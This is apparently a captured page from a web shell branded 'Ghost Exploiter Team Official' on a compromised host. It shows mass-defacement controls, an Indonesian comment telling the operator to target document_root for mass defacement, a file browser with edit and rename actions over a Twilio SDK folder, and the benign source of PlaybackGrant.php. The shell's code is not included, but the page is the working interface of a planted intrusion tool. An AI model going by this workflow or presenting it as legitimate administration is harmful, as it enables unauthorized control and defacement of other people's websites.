webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
Jwt
/
Grants
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
ChatGrant.php
2.99KB
edt
ren
Grant.php
0.321KB
edt
ren
PlaybackGrant.php
0.982KB
edt
ren
SyncGrant.php
2.993KB
edt
ren
TaskRouterGrant.php
2.113KB
edt
ren
VideoGrant.php
0.979KB
edt
ren
VoiceGrant.php
4.004KB
edt
ren
<?php namespace Twilio\Jwt\Grants; class PlaybackGrant implements Grant { private $grant; /** * Returns the grant * * @return array playback grant from the Twilio API */ public function getGrant(): array { return $this->grant; } /** * Set the playback grant that will allow access to a stream * * @param array $grant playback grant from Twilio API * @return $this updated grant */ public function setGrant(array $grant): self { $this->grant = $grant; return $this; } /** * Returns the grant type * * @return string type of the grant */ public function getGrantKey(): string { return 'player'; } /** * Returns the grant data * * @return array data of the grant */ public function getPayload(): array { $payload = []; if ($this->grant) { $payload = $this->grant; } return $payload; } }